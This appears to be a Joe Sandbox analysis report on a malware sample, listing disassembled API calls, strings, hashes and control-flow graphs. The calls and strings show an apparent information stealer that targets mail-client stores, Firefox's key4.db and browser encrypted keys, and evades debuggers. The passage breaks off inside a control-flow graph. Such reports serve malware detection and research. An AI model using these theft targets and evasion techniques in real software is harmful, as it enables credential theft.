                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Query$InformationProcessVirtual
                                                            • String ID: ]^4$^^4$^^4$^^4
                                                            • API String ID: 1364735940-2923853987
                                                            • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                            • Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
                                                            • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                            • Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F
                                                            APIs
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
                                                            • GetSystemMetrics.USER32(00000001), ref: 004333C3
                                                            • GetSystemMetrics.USER32(00000000), ref: 0043341E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MetricsSystem$Create
                                                            • String ID: DISPLAY
                                                            • API String ID: 1087689917-865373369
                                                            • Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                            • Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
                                                            • Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                            • Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
                                                            • ExitProcess.KERNEL32 ref: 00402428
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessSleep
                                                            • String ID: Ku^%$Ku^%
                                                            • API String ID: 911557368-1067927601
                                                            • Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                            • Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
                                                            • Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                            • Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B
                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID: 9a%^$M%$M%
                                                            • API String ID: 1778838933-3204844187
                                                            • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                            • Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
                                                            • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                            • Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
                                                            • API String ID: 0-4169501468
                                                            • Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                            • Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
                                                            • Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                            • Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF
                                                            APIs
                                                            • lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcmpi
                                                            • String ID: VL6T$VL6T$kernel32.dll
                                                            • API String ID: 1586166983-858732239
                                                            • Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                            • Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
                                                            • Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                            • Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: UL6T$VL6T$VL6T$kernel32.dll
                                                            • API String ID: 4038537762-2028718673
                                                            • Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                            • Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
                                                            • Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                            • Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CryptDataUnprotect
                                                            • String ID: crypt32.dll$os_c576xedrypt.encry576xedpted_key
                                                            • API String ID: 834300711-975908830
                                                            • Opcode ID: fb083bdf54fe577958849d68ecb72033554b56777c420c9d053bdbe08a402f79
                                                            • Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
                                                            • Opcode Fuzzy Hash: fb083bdf54fe577958849d68ecb72033554b56777c420c9d053bdbe08a402f79
                                                            • Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
                                                            • lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: \key4.db
                                                            • API String ID: 4038537762-2908133219
                                                            • Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                            • Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
                                                            • Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                            • Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                            • API String ID: 0-1928883120
                                                            • Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                            • Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
                                                            • Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                            • Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB
                                                            APIs
                                                              • Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                              • Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                            • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 3335090040-239921721
                                                            • Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                            • Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
                                                            • Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                            • Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gU@
                                                            • API String ID: 0-63564854
                                                            • Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                            • Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
                                                            • Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                            • Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B
                                                            APIs
                                                            • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: ntdll.dll
                                                            • API String ID: 3535843008-2227199552
                                                            • Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                            • Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
                                                            • Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                            • Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE
                                                            APIs
                                                            • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: ntdll.dll
                                                            • API String ID: 3535843008-2227199552
                                                            • Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                            • Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
                                                            • Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                            • Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027794A6
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 027794C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, Offset: 02778000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2778000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: d2e462dbb2bb9301d781cb8ab8da24d9a2ca8af6625df05db7297e2d504587f7
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 1DF09635101710AFEB203BF5DC8DB6FB6ECAF49624F100538E742914C0DB74E8454A61
                                                            APIs
                                                            • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811
                                                              • Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationLibraryLoadQuerySystem
                                                            • String ID:
                                                            • API String ID: 1217483125-0
                                                            • Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                            • Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
                                                            • Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                            • Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B
                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID:
                                                            • API String ID: 1778838933-0
                                                            • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
                                                            • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B
                                                            APIs
                                                            • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationThread
                                                            • String ID:
                                                            • API String ID: 4046476035-0
                                                            • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                            • Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
                                                            • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                            • Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87
                                                            APIs
                                                            • NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                            • Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
                                                            • Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                            • Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                            • Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
                                                            • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                            • Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                            • Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
                                                            • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                            • Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4991 42f625-42f644 4992 42f64a-42f652 4991->4992 4993 42f654-42f659 4992->4993 4994 42f69b-42f6a0 4992->4994 4995 42f713-42f718 4993->4995 4996 42f65f-42f664 4993->4996 4997 42f756-42f75b 4994->4997 4998 42f6a6-42f6ab 4994->4998 4999 42f850-42f855 4995->4999 5000 42f71e-42f723 4995->5000 5001 42f7ca-42f7cf 4996->5001 5002 42f66a-42f66f 4996->5002 5003 42f761-42f766 4997->5003 5004 42f8a4-42f8a9 4997->5004 5005 42f811-42f816 4998->5005 5006 42f6b1-42f6b6 4998->5006 5019 42f85b-42f860 4999->5019 5020 42fa0e-42fa13 4999->5020 5011 42f93b-42f940 5000->5011 5012 42f729-42f72e 5000->5012 5007 42f9b0-42f9b5 5001->5007 5008 42f7d5-42f7da 5001->5008 5013 42f675-42f67a 5002->5013 5014 42f8d8-42f8dd 5002->5014 5017 42f984-42f989 5003->5017 5018 42f76c-42f771 5003->5018 5009 42fa29-42fa2e 5004->5009 5010 42f8af-42f8b4 5004->5010 5015 42f81c-42f821 5005->5015 5016 42f9dd-42f9e2 5005->5016 5021 42f8fa-42f8ff 5006->5021 5022 42f6bc-42f6c1 5006->5022 5027 42f9bb-42f9c0 5007->5027 5028 42fcd8-42fcdf 5007->5028 5023 42f7e0-42f7e5 5008->5023 5024 42fb7d-42fbad 5008->5024 5037 42fa34-42fa39 5009->5037 5038 42fab9-42fac6 5009->5038 5043 42f8ba-42f8bf 5010->5043 5044 42fa8b-42faa8 5010->5044 5053 42fc71-42fc96 5011->5053 5054 42f946-42f94b 5011->5054 5045 42f734-42f739 5012->5045 5046 42fb0d-42fb39 5012->5046 5029 42f680-42f685 5013->5029 5030 42facb-42fad9 5013->5030 5047 42f8e3-42f8e8 5014->5047 5048 42fc27-42fc4a 5014->5048 5031 42f827-42f82c 5015->5031 5032 42fbe9-42fc18 call 42f625 call 430228 5015->5032 5033 42fce4-42fcef 5016->5033 5034 42f9e8-42f9ed 5016->5034 5025 42fca5-42fcc9 5017->5025 5026 42f98f-42f994 5017->5026 5051 42fd10-42fd17 5018->5051 5052 42f777-42f77c 5018->5052 5039 42f866-42f86b 5019->5039 5040 42fa75-42fa86 lstrcatW 5019->5040 5035 42fa19-42fa1e 5020->5035 5036 42faad-42fab4 5020->5036 5049 42fc57-42fc6c lstrcatW 5021->5049 5050 42f905-42f90a 5021->5050 5041 42faf7-42fb08 lstrcatW 5022->5041 5042 42f6c7-42f6cc 5022->5042 5057 42f7eb-42f7f0 5023->5057 5058 42fbbd-42fbd2 lstrcatW * 2 call 40b7bb 5023->5058 5059 42fbb3-42fbb8 5024->5059 5060 42fc9d-42fca0 5024->5060 5055 42fcd0-42fcd3 5025->5055 5068 42fccb 5025->5068 5026->4992 5074 42f99a-42f9ab lstrcatW 5026->5074 5027->4992 5075 42f9c6-42f9d8 lstrcatW 5027->5075 5028->4992 5076 42f68b-42f690 5029->5076 5077 42fade-42fae7 5029->5077 5030->4992 5061 42f832-42f84b call 447047 5031->5061 5062 42fd1c-42fd21 5031->5062 5082 42fc1b-42fc22 5032->5082 5070 42fcf1-42fcf9 5033->5070 5071 42fcfb 5033->5071 5034->4992 5078 42f9f3-42fa09 5034->5078 5035->5071 5079 42fa24 5035->5079 5036->4992 5037->4992 5080 42fa3f-42fa70 call 419e6b call 447a80 * 2 5037->5080 5038->4992 5039->4992 5064 42f871-42f894 5039->5064 5040->4992 5041->4992 5081 42f6d2-42f6d7 5042->5081 5042->5082 5043->4992 5067 42f8c5-42f8d3 5043->5067 5044->4992 5083 42fb49-42fb6c call 447047 lstrcatW 5045->5083 5084 42f73f-42f744 5045->5084 5046->5055 5056 42fb3f-42fb44 5046->5056 5047->4992 5069 42f8ee-42f8f5 5047->5069 5048->5055 5065 42fc50-42fc55 5048->5065 5049->4992 5050->4992 5072 42f910-42f91b call 40b129 5050->5072 5051->4992 5085 42f782-42f787 5052->5085 5086 42fb71-42fb78 5052->5086 5053->5060 5066 42fc98 5053->5066 5054->4992 5073 42f951-42f974 5054->5073 5055->4992 5056->5055 5057->4992 5088 42f7f6-42f801 5057->5088 5106 42fbd7-42fbe4 5058->5106 5059->5060 5060->4992 5061->4992 5062->4992 5095 42fd27-42fd34 5062->5095 5064->5055 5092 42f89a-42f89f 5064->5092 5065->5055 5066->5060 5067->4992 5068->5055 5069->4992 5070->5051 5070->5071 5094 42fcfc 5071->5094 5109 42f920-42f936 5072->5109 5073->5055 5096 42f97a-42f97f 5073->5096 5074->4992 5075->4992 5076->4992 5097 42f692-42f699 5076->5097 5077->5055 5101 42faed-42faf2 5077->5101 5078->4992 5079->4992 5080->4992 5081->4992 5099 42f6dd-42f703 5081->5099 5082->4992 5083->4992 5084->4992 5100 42f74a-42f751 5084->5100 5085->4992 5102 42f78d-42f7ba 5085->5102 5086->4992 5088->5055 5105 42f807-42f80c 5088->5105 5092->5055 5094->5094 5096->5055 5097->4992 5099->5055 5111 42f709-42f70e 5099->5111 5100->4992 5101->5055 5102->5060 5103 42f7c0-42f7c5 5102->5103 5103->5060 5105->5055 5106->4992 5109->4992 5111->5055
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 0042F9A2
                                                            • lstrcatW.KERNEL32(?,?), ref: 0042F9CF
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: (lu$)lu$)lu$n_v$n_v$n_v
                                                            • API String ID: 4038537762-1534030094
                                                            • Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                            • Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
                                                            • Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                            • Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5808 41a28f-41a2c9 call 447e24 call 44568a 5813 41a2cc-41a2d4 5808->5813 5814 41a341-41a346 5813->5814 5815 41a2d6-41a2db 5813->5815 5818 41a34c-41a351 5814->5818 5819 41a40e-41a413 5814->5819 5816 41a2e1-41a2e6 5815->5816 5817 41a3c5-41a3ca 5815->5817 5820 41a458-41a45d 5816->5820 5821 41a2ec-41a2f1 5816->5821 5822 41a3d0-41a3d5 5817->5822 5823 41a4f7-41a4fc 5817->5823 5824 41a357-41a35c 5818->5824 5825 41a4b8-41a4bd 5818->5825 5826 41a419-41a41e 5819->5826 5827 41a53a-41a53f 5819->5827 5830 41a463-41a468 5820->5830 5831 41a635-41a63a 5820->5831 5832 41a2f7-41a2fc 5821->5832 5833 41a578-41a57d 5821->5833 5836 41a5cb-41a5d0 5822->5836 5837 41a3db-41a3e0 5822->5837 5828 41a502-41a507 5823->5828 5829 41a6c9-41a6ce 5823->5829 5840 41a362-41a367 5824->5840 5841 41a5a5-41a5aa 5824->5841 5838 41a6a1-41a6a6 5825->5838 5839 41a4c3-41a4c8 5825->5839 5842 41a424-41a429 5826->5842 5843 41a5ed-41a5f2 5826->5843 5834 41a705-41a70a 5827->5834 5835 41a545-41a54a 5827->5835 5862 41a50d-41a512 5828->5862 5863 41a85f-41a866 5828->5863 5868 41a6d4-41a6d9 5829->5868 5869 41a99e-41a9a9 call 447e24 5829->5869 5848 41a7e7-41a7ee 5830->5848 5849 41a46e-41a473 5830->5849 5856 41a640-41a645 5831->5856 5857 41a97f-41a98d 5831->5857 5852 41a302-41a307 5832->5852 5853 41a727-41a735 5832->5853 5872 41a583-41a588 5833->5872 5873 41aa24-41aa2b 5833->5873 5874 41a9c0-41a9cb 5834->5874 5875 41a710-41a715 5834->5875 5866 41a550-41a555 5835->5866 5867 41a886-41a89c 